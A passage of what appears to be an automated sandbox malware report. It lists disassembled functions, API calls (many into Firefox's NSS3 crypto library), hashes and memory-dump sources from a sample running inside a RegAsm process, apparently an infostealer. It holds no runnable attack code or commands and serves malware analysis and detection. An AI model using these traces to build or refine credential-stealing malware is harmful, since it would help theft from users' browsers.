                                                                                                        • InitializeCriticalSection.KERNEL32(6C11F770), ref: 6C0A45A2
                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C0A45AA
                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C0A45BB
                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C11F818,6C09F240,?,?), ref: 6C0A4612
                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0A4636
                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C0A4644
                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0A466D
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A469F
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46AB
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46B2
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46B9
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46C0
                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0A46CD
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C0A46F1
                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0A46FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                        • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                        • API String ID: 1702738223-3894940629
                                                                                                        • Opcode ID: 6fa3bce972a3d8ee3bc9277cd5b5eaa7257b4af0ae00668eb853f11ddcdb83a0
                                                                                                        • Instruction ID: c175dbcc9685ed89fd1f4a4e5a0a30b8c91e4cf51e037d14f20d9393967637ed
                                                                                                        • Opcode Fuzzy Hash: 6fa3bce972a3d8ee3bc9277cd5b5eaa7257b4af0ae00668eb853f11ddcdb83a0
                                                                                                        • Instruction Fuzzy Hash: 7E612CB4A04344AFEB109FE4CD0AB957BF8EF4630CF048568E5149BE52DBB89A46CF51
                                                                                                        Function 6C1E8E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_WrapKey), ref: 6C1E8E76
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E8EA4
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8EB3
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8EC9
                                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C1E8EE5
                                                                                                        • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C1E8F17
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8F29
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8F3F
                                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C1E8F71
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8F80
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8F96
                                                                                                        • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C1E8FB2
                                                                                                        • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C1E8FCD
                                                                                                        • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C1E9047
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$n,l
                                                                                                        • API String ID: 1003633598-3946023815
                                                                                                        • Opcode ID: 15e196d84bd27930227618e1a94e7392ba0850f3788fdaaabe93743d44378891
                                                                                                        • Instruction ID: 334452c18717a5e8ae2e276ea1bd8c9c51232c2ed8647b5f2afb3a6a208edcae
                                                                                                        • Opcode Fuzzy Hash: 15e196d84bd27930227618e1a94e7392ba0850f3788fdaaabe93743d44378891
                                                                                                        • Instruction Fuzzy Hash: 6E510635601508AFEB00DF58DD49F9B377AEB4A31CF494065FD08ABE12D735A918CB92
                                                                                                        Function 00424B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
                                                                                                        • __mtterm.LIBCMT ref: 00424B2B
                                                                                                          • Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
                                                                                                          • Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
                                                                                                        • TlsAlloc.KERNEL32 ref: 00424BB8
                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 00424BD3
                                                                                                        • __init_pointers.LIBCMT ref: 00424BDD
                                                                                                        • EncodePointer.KERNEL32 ref: 00424BEE
                                                                                                        • EncodePointer.KERNEL32 ref: 00424BFB
                                                                                                        • EncodePointer.KERNEL32 ref: 00424C08
                                                                                                        • EncodePointer.KERNEL32 ref: 00424C15
                                                                                                        • DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
                                                                                                        • __calloc_crt.LIBCMT ref: 00424C4B
                                                                                                        • DecodePointer.KERNEL32(00000000), ref: 00424C65
                                                                                                        • __initptd.LIBCMT ref: 00424C70
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00424C77
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 3732613303-3819984048
                                                                                                        • Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
                                                                                                        • Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
                                                                                                        • Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
                                                                                                        • Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D
                                                                                                        Function 6C214FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1C75C2,00000000,00000000,00000001), ref: 6C215009
                                                                                                        • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1C75C2,00000000), ref: 6C215049
                                                                                                        • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C21505D
                                                                                                        • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C215071
                                                                                                        • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215089
                                                                                                        • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2150A1
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C2150B2
                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1C75C2), ref: 6C2150CB
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2150D9
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2150F5
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215103
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C21511D
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C21512B
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215145
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215153
                                                                                                        • free.MOZGLUE(?), ref: 6C21516D
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C21517B
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C215195
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                        • String ID: config=$library=$name=$nss=$parameters=
                                                                                                        • API String ID: 391827415-203331871
                                                                                                        • Opcode ID: 1d630b1b1d5c0240290842e7511904d641c0aad4572f45035862bb1b941277bd
                                                                                                        • Instruction ID: 682dbe1292c3a0020dadc1b3a6b7014b9f908a3943aeab2de5e979644d6869e5
                                                                                                        • Opcode Fuzzy Hash: 1d630b1b1d5c0240290842e7511904d641c0aad4572f45035862bb1b941277bd
                                                                                                        • Instruction Fuzzy Hash: D551D4B1A0520E5FEB01DE289C41AAB37F8AF05259F140074FD15E7B41EB25E919C7B2
                                                                                                        Function 6C214C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214C50
                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214C5B
                                                                                                        • PR_smprintf.NSS3(6C2EAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214C76
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214CAE
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214CC9
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214CF4
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214D0B
                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214D5E
                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214D68
                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C214D85
                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C214DA2
                                                                                                        • free.MOZGLUE(?), ref: 6C214DB9
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214DCF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                        • API String ID: 3756394533-2552752316
                                                                                                        • Opcode ID: 93710ff69b6fd6e7d6386a69b3eb9748b5e189d6ebcfbf1ac36b0d5cdd26a34c
                                                                                                        • Instruction ID: 131665d886458c5b9bf676de625bf85a7fecad270681b00daf01bf0f3ec9919b
                                                                                                        • Opcode Fuzzy Hash: 93710ff69b6fd6e7d6386a69b3eb9748b5e189d6ebcfbf1ac36b0d5cdd26a34c
                                                                                                        • Instruction Fuzzy Hash: DB419CB6A1414AA7DB129F149C41ABB7AA9AF8630CF444138FD0E5BF01E731D924C7E3
                                                                                                        Function 6C1F6910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C1F6943
                                                                                                          • Part of subcall function 6C214210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6F09BAB5,flags,?,00000000,?,6C1F5947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C214220
                                                                                                          • Part of subcall function 6C214210: NSSUTIL_ArgGetParamValue.NSS3(?,6C1F5947,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703,?,00000000,00000000), ref: 6C21422D
                                                                                                          • Part of subcall function 6C214210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703), ref: 6C21424B
                                                                                                          • Part of subcall function 6C214210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703,?,00000000), ref: 6C214272
                                                                                                        • NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C1F6957
                                                                                                        • NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C1F6972
                                                                                                        • NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C1F6983
                                                                                                          • Part of subcall function 6C213EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C1EC79F,?,6C1F6247,70E85609,?,?,6C1EC79F,6C1F781D,?,6C1EBD52,00000001,70E85609,D85D8B04,?), ref: 6C213EB8
                                                                                                        • PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C1F69AA
                                                                                                        • PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C1F69BE
                                                                                                        • PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C1F69D2
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C1F69DF
                                                                                                          • Part of subcall function 6C214020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C2150B7,?), ref: 6C214041
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F69F6
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C1F6A04
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6A1B
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C1F6A29
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6A3F
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C1F6A4D
                                                                                                        • NSSUTIL_ArgStrip.NSS3(?), ref: 6C1F6A5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
                                                                                                        • String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
                                                                                                        • API String ID: 2065226673-2785624044
                                                                                                        • Opcode ID: d43ca250b2661efe00b705f5740b88959d9f94b828c9669bd9e6832f2d2b20e6
                                                                                                        • Instruction ID: 6c2330b90b9e27dc75dab6639d8ada21c77c0aa483b368f6d54bfacb4e8522da
                                                                                                        • Opcode Fuzzy Hash: d43ca250b2661efe00b705f5740b88959d9f94b828c9669bd9e6832f2d2b20e6
                                                                                                        • Instruction Fuzzy Hash: F2418FF1A4030D6BE700DA65AC81B9B76ECAF1524CF140424ED19E6B02F735DA1987A2
                                                                                                        Function 6C1F6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C1F6943
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C1F6957
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C1F6972
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C1F6983
                                                                                                          • Part of subcall function 6C1F6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C1F69AA
                                                                                                          • Part of subcall function 6C1F6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C1F69BE
                                                                                                          • Part of subcall function 6C1F6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C1F69D2
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C1F69DF
                                                                                                          • Part of subcall function 6C1F6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C1F6A5B
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C1F6D8C
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6DC5
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6DD6
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6DE7
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C1F6E1F
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6E4B
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6E72
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6EA7
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6EC4
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6ED5
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6EE3
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6EF4
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6F08
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6F35
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6F44
                                                                                                        • free.MOZGLUE(?), ref: 6C1F6F5B
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6F65
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C1F781D,00000000,6C1EBE2C,?,6C1F6B1D,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C40
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C1F781D,?,6C1EBE2C,?), ref: 6C1F6C58
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C6F
                                                                                                          • Part of subcall function 6C1F6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C1F6C84
                                                                                                          • Part of subcall function 6C1F6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C1F6C96
                                                                                                          • Part of subcall function 6C1F6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C1F6CAA
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6F90
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C1F6FC5
                                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C1F6FF4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                        • String ID: +` l
                                                                                                        • API String ID: 1304971872-3474994642
                                                                                                        • Opcode ID: 71103fdc7170539f020a6110365be6800445c68e8798419caca3965256b6dd6d
                                                                                                        • Instruction ID: e13dff7dfb5ba50ebb3e69d2a29a8e0b1d6c0c1a753f3071c1938a2dc52d7397
                                                                                                        • Opcode Fuzzy Hash: 71103fdc7170539f020a6110365be6800445c68e8798419caca3965256b6dd6d
                                                                                                        • Instruction Fuzzy Hash: 1DB17FB2E0120D9FEF00CBA5D845B9EBBF8AF15348F140129E825E7641E735E916CBA1
                                                                                                        Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 00401A13
                                                                                                        • lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
